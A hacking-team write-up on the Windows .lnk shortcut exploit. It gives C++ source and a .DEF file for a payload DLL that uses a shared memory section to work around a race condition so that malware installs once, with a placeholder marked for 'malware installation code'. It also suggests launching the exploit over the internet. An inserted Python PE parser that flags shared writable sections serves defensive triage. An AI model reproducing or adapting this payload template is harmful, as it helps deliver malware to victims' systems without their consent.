Team : Legion Of Xtremers / ethicalhackingtips
author : "mukesh"
Greetz : Prashant Uniyal, b0nd, D4rk457, and Secfence team.
Exploit path : http://www.exploit-db.com/exploits/14403/
Exploit by : Ivanlef0u
Windows Link exploit (shortcut file) race condition tackling
The .lnk exploit retrieves a DLL from a remote machine and executes it while the icon
for the shortcut (.lnk file) is being resolved.
The race condition:
The .lnk exploitation suffers from a race condition: the downloaded DLL is loaded and executed
three times simultaneously. This breaks the payload whenever the DLL tries to write a file
to disk or tries to access and change any other resource on the victim system, because all
three copies compete for the same resource.
The first thing to note is that the .lnk exploit is actually an undocumented DLL-injection
technique.
The .lnk file will retrieve a file with a .dll, .cpl or .ocx extension; all of these are
legitimate dynamic libraries with DllMain() defined.
The race condition needs to be resolved inside this retrieved DLL.
In this example, we are going to download and execute x.dll.
The sample DLL code is (assuming 'x' is the project name):
/* ------------x.cpp--------------------*/
#include <windows.h>  // must precede <shellapi.h>; also defines BOOL, APIENTRY and the DLL_* constants
#include <iostream>
#include <shellapi.h>

#pragma data_seg(".xdat") // Shared memory section to tackle the race condition
bool xcheck = false;      // must carry an initialiser so it lands in .xdat and not in .bss
#pragma data_seg()

void x() {
    // The exploit worked, now install malware
    // Place all malware installation code here.
    // The code to access the resources
    // like file creation etc...
}

void in() { // This routine will handle the race condition
    // If xcheck is still false, set it to true and access the resources;
    // otherwise just exit the routine. Because .xdat is a shared section,
    // the flag is visible to every process that loads the DLL.
    // Note: this check-and-set is not atomic, so it narrows the window
    // rather than closing it.
    if (xcheck == false) {
        xcheck = true;
        x();
    }
}

BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        in();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
/*----------end of file-----------------*/
An x.DEF file is also needed and must be added to the project workspace.
This file defines the attributes of the custom memory section:
SECTIONS
.xdat READ WRITE SHARED
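A section declared READ WRITE SHARED as above leaves a concrete artifact in the binary: the linker sets IMAGE_SCN_MEM_SHARED in that section's header, and a DLL shipping a writable cross-process section is unusual enough to be worth flagging during triage. The parser below is an added example, not part of the original write-up; it walks a PE section table and reports sections that are both writable and shared. SAMPLE_PE and build_sample_pe are names of this example, and the sample image is a constructed minimal header (no code, not loadable) that mirrors the .text/.data/.xdat layout the DLL above would produce.

```python
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_MEM_SHARED  = 0x10000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE   = 0x80000000

def pe_sections(data):
    """Yield (name, characteristics) for every entry in a PE image's section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                    # IMAGE_FILE_HEADER
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size                           # first IMAGE_SECTION_HEADER
    for i in range(nsections):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]
        yield name, chars

def shared_writable_sections(data):
    """Names of sections that are both writable and shared (what 'READ WRITE SHARED' produces)."""
    return [n for n, c in pe_sections(data)
            if c & IMAGE_SCN_MEM_SHARED and c & IMAGE_SCN_MEM_WRITE]

def build_sample_pe(sections):
    """Constructed minimal PE header (no code, not loadable) carrying the given section table."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=i386, NumberOfSections, timestamp, symtab, nsyms, SizeOfOptionalHeader=0, Characteristics=DLL
    file_header = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x2102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, 0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i,
                    0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return dos_header + b"PE\0\0" + file_header + table

# Constructed sample mirroring the write-up's layout: ordinary code/data plus the shared .xdat.
SAMPLE_PE = build_sample_pe([
    (b".text", 0x60000020),   # code | execute | read
    (b".data", 0xC0000040),   # initialized data | read | write
    (b".xdat", 0xD0000040),   # initialized data | read | write | SHARED
])

if __name__ == "__main__":
    print("shared writable sections:", shared_writable_sections(SAMPLE_PE))  # ['.xdat']
```

Pointing pe_sections at a file read in binary mode works the same way; only the constructed sample is built in memory here.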
There exist more ways to tackle the race condition, such as the use of mutexes, semaphores etc.
The same exploit can also be made cross-browser and can also be launched via the internet.
But try it a little yourself. I'll tell you later...."mukesh"
[Study the exploit to learn more about the above discussion. The link has been provided above.]